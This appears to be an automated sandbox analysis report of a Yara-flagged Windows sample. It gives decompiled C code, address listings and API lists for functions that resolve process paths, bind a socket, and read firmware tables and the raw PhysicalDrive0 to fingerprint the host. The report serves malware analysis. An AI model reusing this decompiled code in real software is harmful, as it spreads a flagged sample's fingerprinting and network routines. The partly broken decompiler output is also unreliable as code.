								_t111 = _t111 + 0xc;
								__eflags = _t56;
								if(_t56 == 0) {
									wsprintfW(_v540, L"%s%s",  &_v16,  &_v536 + _t76 * 2);
									_t111 = _t111 + 0x10;
								} else {
									asm("o16 nop [eax+eax]");
									do {
										_t63 =  *_t106 & 0x0000ffff;
										_t106 =  &(_t106[1]);
										__eflags = _t63;
									} while (_t63 != 0);
									__eflags =  *_t106 - _t63;
									if( *_t106 != _t63) {
										continue;
									}
								}
								goto L14;
							}
						} else {
							E04ED573F(_t74);
							return E04ED572E(_v8 ^ _t107);
						}
					}
				}
			}


































                                                                                    0x04ec4560
                                                                                    0x04ec4569
                                                                                    0x04ec4570
                                                                                    0x04ec457b
                                                                                    0x04ec4580
                                                                                    0x04ec4586
                                                                                    0x04ec4599
                                                                                    0x04ec459e
                                                                                    0x04ec45a1
                                                                                    0x04ec45ae
                                                                                    0x04ec45b6
                                                                                    0x04ec471d
                                                                                    0x04ec4720
                                                                                    0x04ec472b
                                                                                    0x04ec45bc
                                                                                    0x04ec45bc
                                                                                    0x04ec45c9
                                                                                    0x04ec45cb
                                                                                    0x04ec45cd
                                                                                    0x04ec471c
                                                                                    0x00000000
                                                                                    0x04ec45d3
                                                                                    0x04ec45d5
                                                                                    0x04ec45df
                                                                                    0x04ec45e7
                                                                                    0x04ec45e8
                                                                                    0x04ec45ed
                                                                                    0x04ec45f4
                                                                                    0x04ec45fa
                                                                                    0x04ec4600
                                                                                    0x04ec4605
                                                                                    0x04ec460e
                                                                                    0x04ec462a
                                                                                    0x04ec462f
                                                                                    0x04ec4632
                                                                                    0x04ec4638
                                                                                    0x04ec463d
                                                                                    0x04ec4641
                                                                                    0x04ec4646
                                                                                    0x04ec4649
                                                                                    0x04ec464b
                                                                                    0x04ec464d
                                                                                    0x04ec464d
                                                                                    0x04ec4660
                                                                                    0x04ec4664
                                                                                    0x04ec4666
                                                                                    0x04ec4668
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec466a
                                                                                    0x04ec4670
                                                                                    0x04ec4673
                                                                                    0x04ec467a
                                                                                    0x04ec4692
                                                                                    0x04ec4694
                                                                                    0x04ec4695
                                                                                    0x04ec469a
                                                                                    0x04ec469d
                                                                                    0x04ec46a6
                                                                                    0x04ec46a8
                                                                                    0x04ec46aa
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec46aa
                                                                                    0x04ec4707
                                                                                    0x04ec470d
                                                                                    0x04ec4713
                                                                                    0x00000000
                                                                                    0x04ec46ac
                                                                                    0x04ec46b3
                                                                                    0x04ec46be
                                                                                    0x04ec46c3
                                                                                    0x04ec46c6
                                                                                    0x04ec46c8
                                                                                    0x04ec46fe
                                                                                    0x04ec4704
                                                                                    0x04ec46ca
                                                                                    0x04ec46ca
                                                                                    0x04ec46d0
                                                                                    0x04ec46d0
                                                                                    0x04ec46d3
                                                                                    0x04ec46d6
                                                                                    0x04ec46d6
                                                                                    0x04ec46db
                                                                                    0x04ec46de
                                                                                    0x00000000
                                                                                    0x04ec46e0
                                                                                    0x04ec46de
                                                                                    0x00000000
                                                                                    0x04ec46c8
                                                                                    0x04ec4610
                                                                                    0x04ec4611
                                                                                    0x04ec4629
                                                                                    0x04ec4629
                                                                                    0x04ec460e
                                                                                    0x04ec45cd

                                                                                    APIs
                                                                                    • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,?,?,?,?,74E069A0), ref: 04EC45AE
                                                                                    • GetLogicalDriveStringsW.KERNEL32(00000000,00000000,00000001,?,?,?,?,?,74E069A0), ref: 04EC45C7
                                                                                    • GetLogicalDriveStringsW.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,74E069A0), ref: 04EC460A
                                                                                    • QueryDosDeviceW.KERNEL32(?,00000000,00000104,?,?,?,?,00000000,?,?,?,?,?,74E069A0), ref: 04EC4664
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,74E069A0), ref: 04EC466A
                                                                                    • QueryDosDeviceW.KERNEL32(?,00000000,00000001,?,?,?,?,?,?,?,?,?,00000000), ref: 04EC46A6
                                                                                    • lstrlenW.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,74E069A0), ref: 04EC46AD
                                                                                    • wsprintfW.USER32 ref: 04EC46FE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DeviceDriveLogicalQueryStrings$ErrorFileImageLastNameProcesslstrlenwsprintf
                                                                                    • String ID: %s%s
                                                                                    • API String ID: 1509662898-3252725368
                                                                                    • Opcode ID: 56d0e68a0f2a8283231a963239c2a241cf63ef1e73cce3cfb37c73977dfd9716
                                                                                    • Instruction ID: a1b007cfbe311bbc757a8a9410eace3e34ee777a016c60a521e9d66fa25284a2
                                                                                    • Opcode Fuzzy Hash: 56d0e68a0f2a8283231a963239c2a241cf63ef1e73cce3cfb37c73977dfd9716
                                                                                    • Instruction Fuzzy Hash: 5541D971E41208BBEB20EB65DC45FBEB7ACDF44708F101569E90AE7180FA75AE028B55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ED2030, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 92networkCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 38%
                                                                                    			E04ED2030(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				signed short _v36;
				intOrPtr _v40;
				signed int _t19;
				intOrPtr _t21;
				long _t25;
				long _t30;
				signed short _t36;
				intOrPtr* _t38;
				void* _t49;
				long _t53;
				signed int _t54;

				_t19 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t19 ^ _t54;
				_t49 = __ecx;
				_t36 = 0;
				_t38 = _a4;
				if(_t38 == 0 ||  *_t38 == 0) {
					_t21 = 0;
				} else {
					_t3 = _t36 + 1; // 0x1
					_t21 = _t3;
				}
				_v40 = _t21;
				_t52 =  !=  ? _t38 : L"0.0.0.0";
				_v36 = 0;
				_v36 = E04ECCC60( !=  ? _t38 : L"0.0.0.0",  !=  ? _t38 : L"0.0.0.0");
				_t25 = E04ECCD10(_t36, 0, _t49, _t52,  &_v36);
				if(_t25 == 0) {
					L11:
					__imp__#111();
					 *((intOrPtr*)(_t49 + 0x58)) = 3;
					SetLastError(_t25);
					goto L12;
				} else {
					_t25 = _v36 & 0x0000ffff;
					__imp__#23(_t25, 1, 6);
					_t53 = _t25;
					if(_t53 == 0xffffffff) {
						goto L11;
					}
					_t29 =  ==  ? 0x10 : 0x1c;
					_t30 =  &_v36;
					__imp__#2(_t53, _t30,  ==  ? 0x10 : 0x1c);
					if(_t30 == 0xffffffff) {
						__imp__#111();
						 *((intOrPtr*)(_t49 + 0x58)) = 4;
						SetLastError(_t30);
						__imp__#3(_t53);
					} else {
						 *((intOrPtr*)(_t49 + 0x40)) = E04ECCFF0(_t53);
						 *((intOrPtr*)(_t49 + 0x44)) = E04ECD060(_t53);
						if(_v40 != _t36) {
							E04ED1C80( &_v36, _t49 + 0x5c);
						}
						_t36 = 1;
						__imp__#3(_t53);
					}
					L12:
					return E04ED572E(_v8 ^ _t54);
				}
			}















                                                                                    0x04ed2036
                                                                                    0x04ed203d
                                                                                    0x04ed2043
                                                                                    0x04ed2045
                                                                                    0x04ed2047
                                                                                    0x04ed204c
                                                                                    0x04ed2058
                                                                                    0x04ed2053
                                                                                    0x04ed2053
                                                                                    0x04ed2053
                                                                                    0x04ed2053
                                                                                    0x04ed205c
                                                                                    0x04ed2064
                                                                                    0x04ed206b
                                                                                    0x04ed2074
                                                                                    0x04ed2080
                                                                                    0x04ed208a
                                                                                    0x04ed2119
                                                                                    0x04ed2119
                                                                                    0x04ed2120
                                                                                    0x04ed2127
                                                                                    0x00000000
                                                                                    0x04ed2090
                                                                                    0x04ed2090
                                                                                    0x04ed2099
                                                                                    0x04ed209f
                                                                                    0x04ed20a4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ed20b5
                                                                                    0x04ed20b9
                                                                                    0x04ed20be
                                                                                    0x04ed20c7
                                                                                    0x04ed20fc
                                                                                    0x04ed2103
                                                                                    0x04ed210a
                                                                                    0x04ed2111
                                                                                    0x04ed20c9
                                                                                    0x04ed20d2
                                                                                    0x04ed20da
                                                                                    0x04ed20e0
                                                                                    0x04ed20e9
                                                                                    0x04ed20e9
                                                                                    0x04ed20ef
                                                                                    0x04ed20f4
                                                                                    0x04ed20f4
                                                                                    0x04ed212d
                                                                                    0x04ed213f
                                                                                    0x04ed213f

                                                                                    APIs
                                                                                    • socket.WS2_32(?,00000001,00000006), ref: 04ED2099
                                                                                    • bind.WS2_32(00000000,00000002,0000001C), ref: 04ED20BE
                                                                                    • closesocket.WS2_32(00000000), ref: 04ED20F4
                                                                                    • WSAGetLastError.WS2_32 ref: 04ED20FC
                                                                                    • SetLastError.KERNEL32 ref: 04ED210A
                                                                                    • closesocket.WS2_32(00000000), ref: 04ED2111
                                                                                    • WSAGetLastError.WS2_32 ref: 04ED2119
                                                                                    • SetLastError.KERNEL32 ref: 04ED2127
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$closesocket$bindsocket
                                                                                    • String ID: 0.0.0.0
                                                                                    • API String ID: 3276209097-3771769585
                                                                                    • Opcode ID: acda53ea136b3be697395b0041ce0fc9e93779e62c2dfd14ba6a2d3fcd1ebae5
                                                                                    • Instruction ID: e19b1e6db5343fd9f94122f971dede38389e3a16375bf625617a0d53a875c860
                                                                                    • Opcode Fuzzy Hash: acda53ea136b3be697395b0041ce0fc9e93779e62c2dfd14ba6a2d3fcd1ebae5
                                                                                    • Instruction Fuzzy Hash: AF318171A002189BDB14DFB5D845AEE77B8FF48315F00516AEE06D3180DB75EC46C7A5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC6740, Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 380libraryfileloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 74%
                                                                                    			E04EC6740(void* __ecx, void* __edi, char* __esi) {
				intOrPtr _v8;
				signed int _v16;
				struct _OVERLAPPED* _v32;
				struct _OVERLAPPED* _v36;
				void _v40;
				char _v44;
				struct _OVERLAPPED* _v48;
				void* _v52;
				long _v56;
				void* _v60;
				intOrPtr _v64;
				signed int _t119;
				_Unknown_base(*)()* _t123;
				intOrPtr _t125;
				void* _t126;
				char _t137;
				char _t138;
				intOrPtr _t140;
				char _t143;
				intOrPtr _t144;
				char _t147;
				intOrPtr _t148;
				void* _t152;
				char _t153;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t159;
				intOrPtr _t163;
				intOrPtr _t167;
				intOrPtr _t171;
				void* _t173;
				intOrPtr _t177;
				void* _t178;
				intOrPtr* _t190;
				intOrPtr* _t192;
				intOrPtr* _t194;
				intOrPtr* _t197;
				intOrPtr* _t199;
				intOrPtr* _t202;
				intOrPtr* _t204;
				intOrPtr* _t206;
				void* _t207;
				intOrPtr _t208;
				intOrPtr _t209;
				intOrPtr _t210;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t214;
				intOrPtr* _t216;
				intOrPtr* _t218;
				void* _t225;
				long _t226;
				long _t227;
				void* _t228;
				char* _t229;
				char* _t230;
				char* _t231;
				void* _t232;
				char* _t233;
				void* _t234;
				void* _t235;
				void* _t236;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr* _t245;
				long _t246;
				void* _t248;
				struct _OVERLAPPED* _t251;
				intOrPtr* _t253;
				void* _t258;
				signed int _t261;
				void* _t262;
				void* _t263;
				void* _t264;
				intOrPtr _t298;

				_t250 = __esi;
				_t186 = __ecx;
				_t261 = (_t258 - 0x00000008 & 0xfffffff0) + 4;
				_v8 =  *((intOrPtr*)(_t258 + 4));
				_t256 = _t261;
				_t262 = _t261 - 0x58;
				_t119 =  *0x4f03008; // 0x3d21fb31
				_v16 = _t119 ^ _t261;
				_push(__esi);
				asm("xorps xmm0, xmm0");
				_v48 = 0;
				asm("movaps [ebp-0x50], xmm0");
				_t245 = 0;
				asm("movaps [ebp-0x20], xmm0");
				_v64 = 0;
				_t123 = GetProcAddress(GetModuleHandleA("kernel32"), "GetSystemFirmwareTable");
				_v56 = _t123;
				if(_t123 != 0) {
					_t250 =  *_t123(0x52534d42, 0, 0, 0);
					_t269 = _t250;
					if(_t250 != 0) {
						_push(_t250);
						_t177 = E04ED5785(_t186, _t250, _t269);
						_t262 = _t262 + 4;
						_v64 = _t177;
						if(_t177 != 0) {
							_t178 = _v56(0x52534d42, 0, _t177, _t250);
							_t237 = _v64;
							_t250 = _t237 + 8;
							_t238 =  *((intOrPtr*)(_t237 + 4));
							if(_t238 == _t178 + 0xfffffff8) {
								_t186 = 0;
								if(_t238 != 0) {
									while( *_t250 != 1) {
										_t253 = _t250 + ( *(_t250 + 1) & 0x000000ff);
										while( *_t253 != _t245) {
											_t253 = _t253 + 1;
										}
										_t186 = _t186 + 1;
										_t250 = _t253 + 2;
										_t276 = _t186 - _t238;
										if(_t186 < _t238) {
											continue;
										} else {
										}
										goto L11;
									}
									_t245 = E04EC66D0(_t250,  *((intOrPtr*)(_t250 + 4)));
									_t186 = _t250 + 8;
									E04EC6640(_t250 + 8, ( *(_v64 + 1) & 0x000000ff) * 0x100 + ( *(_v64 + 2) & 0x000000ff),  &_v44);
									asm("movaps xmm0, [ebp-0x20]");
									_t262 = _t262 + 4;
									asm("movaps [ebp-0x50], xmm0");
								}
							}
						}
					}
				}
				L11:
				_push(0x2000);
				_t225 = E04ED5785(_t186, _t250, _t276);
				_t263 = _t262 + 4;
				_t251 = 0;
				_v60 = _t225;
				if(_t225 != 0) {
					E04EDDAD0(_t245, _t225, 0, 0x2000);
					_t263 = _t263 + 0xc;
					_v56 = 0;
					asm("xorps xmm0, xmm0");
					_v32 = 0;
					asm("movq [ebp-0x1c], xmm0");
					_v40 = 0;
					_v36 = 0;
					_t173 = CreateFileA("\\\\.\\PhysicalDrive0", 0x80000000, 3, 0, 3, 0, 0);
					_v52 = _t173;
					if(_t173 != 0xffffffff) {
						_t186 =  &_v40;
						DeviceIoControl(_t173, 0x2d1400,  &_v40, 0xc, _v60, 0x2000,  &_v56, 0);
						_t251 =  !=  ? _v60 : 0;
						CloseHandle(_v52);
					}
					_t225 = _v60;
				}
				if(_t245 == 0) {
					_t125 = 0;
					__eflags = 0;
				} else {
					_t218 = _t245;
					_t31 = _t218 + 1; // 0x1
					_v52 = _t31;
					do {
						_t171 =  *_t218;
						_t218 = _t218 + 1;
					} while (_t171 != 0);
					_t186 = _t218 - _v52;
					_t125 = _t218 - _v52 + 1;
					_v48 = _t125;
				}
				if(_t251 != 0) {
					_t208 = _t251->OffsetHigh;
					if(_t208 != 0) {
						_t216 = _t208 + _t225;
						_v52 = _t216 + 1;
						do {
							_t167 =  *_t216;
							_t216 = _t216 + 1;
						} while (_t167 != 0);
						_t125 = _v48 + 1 + _t216 - _v52;
						_v48 = _t125;
					}
					_t209 = _t251->hEvent;
					if(_t209 != 0) {
						_t214 = _t209 + _t225;
						_v52 = _t214 + 1;
						do {
							_t163 =  *_t214;
							_t214 = _t214 + 1;
						} while (_t163 != 0);
						_t125 = _v48 + 1 + _t214 - _v52;
						_v48 = _t125;
					}
					_t210 =  *((intOrPtr*)(_t251 + 0x14));
					if(_t210 != 0) {
						_t212 = _t210 + _t225;
						_v52 = _t212 + 1;
						do {
							_t159 =  *_t212;
							_t212 = _t212 + 1;
						} while (_t159 != 0);
						_t125 = _v48 + 1 + _t212 - _v52;
						_v48 = _t125;
					}
					_t186 =  *((intOrPtr*)(_t251 + 0x18));
					if(_t186 != 0) {
						_t211 = _t186 + _t225;
						_t236 = _t211 + 1;
						do {
							_t155 =  *_t211;
							_t211 = _t211 + 1;
						} while (_t155 != 0);
						_t186 = _t211 - _t236;
						_t125 = _v48 + 1 + _t211 - _t236;
						_t298 = _t125;
						_v48 = _t125;
					}
				}
				_t126 = _t125 + 0x28;
				_push(_t126);
				_v52 = _t126;
				_t226 = E04ED5785(_t186, _t251, _t298);
				_t264 = _t263 + 4;
				_v56 = _t226;
				if(_t226 == 0) {
					L68:
					_t246 = _v56;
				} else {
					E04EDDAD0(_t245, _t226, 0, _v52);
					_t227 = _v56;
					_t264 = _t264 + 0xc;
					asm("movaps xmm0, [ebp-0x50]");
					 *_t227 = _v48;
					_t136 = 0x28;
					_v48 = 0x28;
					asm("movups [edx+0x4], xmm0");
					if(_t245 != 0) {
						 *((intOrPtr*)(_t227 + 0x14)) = 0x28;
						_t206 = _t245;
						_t152 = _t227 + 0x28 - _t245;
						_v52 = _t152;
						_t235 = _t152;
						asm("o16 nop [eax+eax]");
						do {
							_t153 =  *_t206;
							_t206 = _t206 + 1;
							 *((char*)(_t235 + _t206 - 1)) = _t153;
						} while (_t153 != 0);
						_t227 = _v56;
						_t71 = _t245 + 1; // 0x1
						_t207 = _t71;
						do {
							_t154 =  *_t245;
							_t245 = _t245 + 1;
						} while (_t154 != 0);
						_t72 = _t245 - _t207 + 0x29; // 0x2a
						_t136 = _t72;
						_v48 = _t136;
					}
					if(_t251 == 0) {
						goto L68;
					} else {
						_t248 = _v60;
						if(_t251->OffsetHigh != 0) {
							 *((intOrPtr*)(_t227 + 0x18)) = _t136;
							_t202 = _t251->OffsetHigh + _t248;
							_t233 = _t227 + _t136;
							do {
								_t147 =  *_t202;
								_t202 = _t202 + 1;
								 *_t233 = _t147;
								_t233 = _t233 + 1;
							} while (_t147 != 0);
							_t204 = _t251->OffsetHigh + _t248;
							_t234 = _t204 + 1;
							do {
								_t148 =  *_t204;
								_t204 = _t204 + 1;
							} while (_t148 != 0);
							_t227 = _v56;
							_t136 = _v48 + 1 + _t204 - _t234;
							_v48 = _t136;
						}
						if(_t251->hEvent != 0) {
							 *((intOrPtr*)(_t227 + 0x1c)) = _t136;
							_t197 = _t251->hEvent + _t248;
							_t231 = _t227 + _t136;
							do {
								_t143 =  *_t197;
								_t197 = _t197 + 1;
								 *_t231 = _t143;
								_t231 = _t231 + 1;
							} while (_t143 != 0);
							_t199 = _t251->hEvent + _t248;
							_t232 = _t199 + 1;
							do {
								_t144 =  *_t199;
								_t199 = _t199 + 1;
							} while (_t144 != 0);
							_t136 = _v48 + 1 + _t199 - _t232;
							_v48 = _t136;
						}
						_t246 = _v56;
						if( *((intOrPtr*)(_t251 + 0x14)) == 0) {
							_t228 = _v60;
						} else {
							 *((intOrPtr*)(_t246 + 0x20)) = _t136;
							_t230 = _t136 + _t246;
							_t192 =  *((intOrPtr*)(_t251 + 0x14)) + _v60;
							do {
								_t138 =  *_t192;
								_t192 = _t192 + 1;
								 *_t230 = _t138;
								_t230 = _t230 + 1;
							} while (_t138 != 0);
							_t228 = _v60;
							_t194 =  *((intOrPtr*)(_t251 + 0x14)) + _t228;
							_v52 = _t194 + 1;
							do {
								_t140 =  *_t194;
								_t194 = _t194 + 1;
							} while (_t140 != 0);
							_t136 = _v48 + 1 + _t194 - _v52;
						}
						if( *((intOrPtr*)(_t251 + 0x18)) != 0) {
							 *((intOrPtr*)(_t246 + 0x24)) = _t136;
							_t190 =  *((intOrPtr*)(_t251 + 0x18)) + _t228;
							_t229 = _t136 + _t246;
							do {
								_t137 =  *_t190;
								_t190 = _t190 + 1;
								 *_t229 = _t137;
								_t229 = _t229 + 1;
							} while (_t137 != 0);
						}
					}
				}
				_t128 = _v60;
				if(_v60 != 0) {
					E04ED573F(_t128);
					_t264 = _t264 + 4;
				}
				_t129 = _v64;
				if(_v64 != 0) {
					E04ED573F(_t129);
				}
				return E04ED572E(_v16 ^ _t256);
			}














































































                                                                                    0x04ec6740
                                                                                    0x04ec6740
                                                                                    0x04ec6749
                                                                                    0x04ec6750
                                                                                    0x04ec6754
                                                                                    0x04ec6756
                                                                                    0x04ec6759
                                                                                    0x04ec6760
                                                                                    0x04ec6763
                                                                                    0x04ec6765
                                                                                    0x04ec6771
                                                                                    0x04ec6779
                                                                                    0x04ec677d
                                                                                    0x04ec677f
                                                                                    0x04ec6783
                                                                                    0x04ec678d
                                                                                    0x04ec6793
                                                                                    0x04ec6798
                                                                                    0x04ec67a8
                                                                                    0x04ec67aa
                                                                                    0x04ec67ac
                                                                                    0x04ec67b2
                                                                                    0x04ec67b3
                                                                                    0x04ec67b8
                                                                                    0x04ec67bb
                                                                                    0x04ec67c0
                                                                                    0x04ec67ce
                                                                                    0x04ec67d1
                                                                                    0x04ec67d7
                                                                                    0x04ec67da
                                                                                    0x04ec67df
                                                                                    0x04ec67e1
                                                                                    0x04ec67e5
                                                                                    0x04ec67e7
                                                                                    0x04ec67f0
                                                                                    0x04ec67f5
                                                                                    0x04ec67f7
                                                                                    0x04ec67f8
                                                                                    0x04ec67fd
                                                                                    0x04ec67fe
                                                                                    0x04ec6801
                                                                                    0x04ec6803
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec6805
                                                                                    0x00000000
                                                                                    0x04ec6803
                                                                                    0x04ec6811
                                                                                    0x04ec6833
                                                                                    0x04ec6836
                                                                                    0x04ec683b
                                                                                    0x04ec683f
                                                                                    0x04ec6842
                                                                                    0x04ec6842
                                                                                    0x04ec67e5
                                                                                    0x04ec67df
                                                                                    0x04ec67c0
                                                                                    0x04ec67ac
                                                                                    0x04ec6846
                                                                                    0x04ec6846
                                                                                    0x04ec6850
                                                                                    0x04ec6852
                                                                                    0x04ec6855
                                                                                    0x04ec6857
                                                                                    0x04ec685c
                                                                                    0x04ec6865
                                                                                    0x04ec686a
                                                                                    0x04ec686d
                                                                                    0x04ec6870
                                                                                    0x04ec6873
                                                                                    0x04ec6876
                                                                                    0x04ec687b
                                                                                    0x04ec688f
                                                                                    0x04ec6892
                                                                                    0x04ec6898
                                                                                    0x04ec689e
                                                                                    0x04ec68ad
                                                                                    0x04ec68b9
                                                                                    0x04ec68c4
                                                                                    0x04ec68c8
                                                                                    0x04ec68c8
                                                                                    0x04ec68ce
                                                                                    0x04ec68ce
                                                                                    0x04ec68d3
                                                                                    0x04ec68f2
                                                                                    0x04ec68f2
                                                                                    0x04ec68d5
                                                                                    0x04ec68d5
                                                                                    0x04ec68d7
                                                                                    0x04ec68da
                                                                                    0x04ec68e0
                                                                                    0x04ec68e0
                                                                                    0x04ec68e2
                                                                                    0x04ec68e3
                                                                                    0x04ec68e7
                                                                                    0x04ec68ea
                                                                                    0x04ec68ed
                                                                                    0x04ec68ed
                                                                                    0x04ec68f6
                                                                                    0x04ec68fc
                                                                                    0x04ec6901
                                                                                    0x04ec6903
                                                                                    0x04ec6908
                                                                                    0x04ec6910
                                                                                    0x04ec6910
                                                                                    0x04ec6912
                                                                                    0x04ec6913
                                                                                    0x04ec691e
                                                                                    0x04ec6920
                                                                                    0x04ec6920
                                                                                    0x04ec6923
                                                                                    0x04ec6928
                                                                                    0x04ec692a
                                                                                    0x04ec692f
                                                                                    0x04ec6932
                                                                                    0x04ec6932
                                                                                    0x04ec6934
                                                                                    0x04ec6935
                                                                                    0x04ec6940
                                                                                    0x04ec6942
                                                                                    0x04ec6942
                                                                                    0x04ec6945
                                                                                    0x04ec694a
                                                                                    0x04ec694c
                                                                                    0x04ec6951
                                                                                    0x04ec6954
                                                                                    0x04ec6954
                                                                                    0x04ec6956
                                                                                    0x04ec6957
                                                                                    0x04ec6962
                                                                                    0x04ec6964
                                                                                    0x04ec6964
                                                                                    0x04ec6967
                                                                                    0x04ec696c
                                                                                    0x04ec696e
                                                                                    0x04ec6970
                                                                                    0x04ec6973
                                                                                    0x04ec6973
                                                                                    0x04ec6975
                                                                                    0x04ec6976
                                                                                    0x04ec697d
                                                                                    0x04ec6980
                                                                                    0x04ec6980
                                                                                    0x04ec6982
                                                                                    0x04ec6982
                                                                                    0x04ec696c
                                                                                    0x04ec6985
                                                                                    0x04ec6988
                                                                                    0x04ec6989
                                                                                    0x04ec6991
                                                                                    0x04ec6993
                                                                                    0x04ec6996
                                                                                    0x04ec699b
                                                                                    0x04ec6af6
                                                                                    0x04ec6af6
                                                                                    0x04ec69a1
                                                                                    0x04ec69a7
                                                                                    0x04ec69ac
                                                                                    0x04ec69af
                                                                                    0x04ec69b5
                                                                                    0x04ec69b9
                                                                                    0x04ec69bb
                                                                                    0x04ec69c0
                                                                                    0x04ec69c3
                                                                                    0x04ec69c9
                                                                                    0x04ec69cb
                                                                                    0x04ec69ce
                                                                                    0x04ec69d3
                                                                                    0x04ec69d5
                                                                                    0x04ec69d8
                                                                                    0x04ec69da
                                                                                    0x04ec69e0
                                                                                    0x04ec69e0
                                                                                    0x04ec69e2
                                                                                    0x04ec69e5
                                                                                    0x04ec69e9
                                                                                    0x04ec69ed
                                                                                    0x04ec69f0
                                                                                    0x04ec69f0
                                                                                    0x04ec69f3
                                                                                    0x04ec69f3
                                                                                    0x04ec69f5
                                                                                    0x04ec69f6
                                                                                    0x04ec69fc
                                                                                    0x04ec69fc
                                                                                    0x04ec69ff
                                                                                    0x04ec69ff
                                                                                    0x04ec6a04
                                                                                    0x00000000
                                                                                    0x04ec6a0a
                                                                                    0x04ec6a0e
                                                                                    0x04ec6a11
                                                                                    0x04ec6a13
                                                                                    0x04ec6a19
                                                                                    0x04ec6a1b
                                                                                    0x04ec6a20
                                                                                    0x04ec6a20
                                                                                    0x04ec6a22
                                                                                    0x04ec6a25
                                                                                    0x04ec6a27
                                                                                    0x04ec6a2a
                                                                                    0x04ec6a31
                                                                                    0x04ec6a33
                                                                                    0x04ec6a36
                                                                                    0x04ec6a36
                                                                                    0x04ec6a38
                                                                                    0x04ec6a39
                                                                                    0x04ec6a42
                                                                                    0x04ec6a46
                                                                                    0x04ec6a48
                                                                                    0x04ec6a48
                                                                                    0x04ec6a4f
                                                                                    0x04ec6a51
                                                                                    0x04ec6a57
                                                                                    0x04ec6a59
                                                                                    0x04ec6a60
                                                                                    0x04ec6a60
                                                                                    0x04ec6a62
                                                                                    0x04ec6a65
                                                                                    0x04ec6a67
                                                                                    0x04ec6a6a
                                                                                    0x04ec6a71
                                                                                    0x04ec6a73
                                                                                    0x04ec6a76
                                                                                    0x04ec6a76
                                                                                    0x04ec6a78
                                                                                    0x04ec6a79
                                                                                    0x04ec6a83
                                                                                    0x04ec6a85
                                                                                    0x04ec6a85
                                                                                    0x04ec6a8c
                                                                                    0x04ec6a8f
                                                                                    0x04ec6ad2
                                                                                    0x04ec6a91
                                                                                    0x04ec6a91
                                                                                    0x04ec6a94
                                                                                    0x04ec6a9a
                                                                                    0x04ec6aa0
                                                                                    0x04ec6aa0
                                                                                    0x04ec6aa2
                                                                                    0x04ec6aa5
                                                                                    0x04ec6aa7
                                                                                    0x04ec6aaa
                                                                                    0x04ec6ab1
                                                                                    0x04ec6ab4
                                                                                    0x04ec6ab9
                                                                                    0x04ec6ac0
                                                                                    0x04ec6ac0
                                                                                    0x04ec6ac2
                                                                                    0x04ec6ac3
                                                                                    0x04ec6ace
                                                                                    0x04ec6ace
                                                                                    0x04ec6ad9
                                                                                    0x04ec6adb
                                                                                    0x04ec6ae1
                                                                                    0x04ec6ae3
                                                                                    0x04ec6ae6
                                                                                    0x04ec6ae6
                                                                                    0x04ec6ae8
                                                                                    0x04ec6aeb
                                                                                    0x04ec6aed
                                                                                    0x04ec6af0
                                                                                    0x04ec6af4
                                                                                    0x04ec6ad9
                                                                                    0x04ec6a04
                                                                                    0x04ec6af9
                                                                                    0x04ec6afe
                                                                                    0x04ec6b01
                                                                                    0x04ec6b06
                                                                                    0x04ec6b06
                                                                                    0x04ec6b09
                                                                                    0x04ec6b0e
                                                                                    0x04ec6b11
                                                                                    0x04ec6b16
                                                                                    0x04ec6b2d

                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32,GetSystemFirmwareTable,?,00000000), ref: 04EC6786
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC678D
                                                                                    • CreateFileA.KERNEL32(\\.\PhysicalDrive0,80000000,00000003,00000000,00000003,00000000,00000000), ref: 04EC6892
                                                                                    • DeviceIoControl.KERNEL32 ref: 04EC68B9
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EC68C8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Handle$AddressCloseControlCreateDeviceFileModuleProc
                                                                                    • String ID: GetSystemFirmwareTable$\\.\PhysicalDrive0$kernel32
                                                                                    • API String ID: 2970610107-3170356133
                                                                                    • Opcode ID: 13ddb0a52022b396464e79f6b53dcbe04438702dff27b5d3da2af361ef7765dc
                                                                                    • Instruction ID: 9cae78e8bac9f3d90017e682b938ae05a3bbea68eef7d595a39e7556d0ed14bc
                                                                                    • Opcode Fuzzy Hash: 13ddb0a52022b396464e79f6b53dcbe04438702dff27b5d3da2af361ef7765dc
                                                                                    • Instruction Fuzzy Hash: 45E1C474A042059FDF15CF78D950AEEFBF1EF49318B18926DD886AB301E732A946CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04ECAA70, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 85%
                                                                                    			E04ECAA70(void* __esi) {
				signed int _v8;
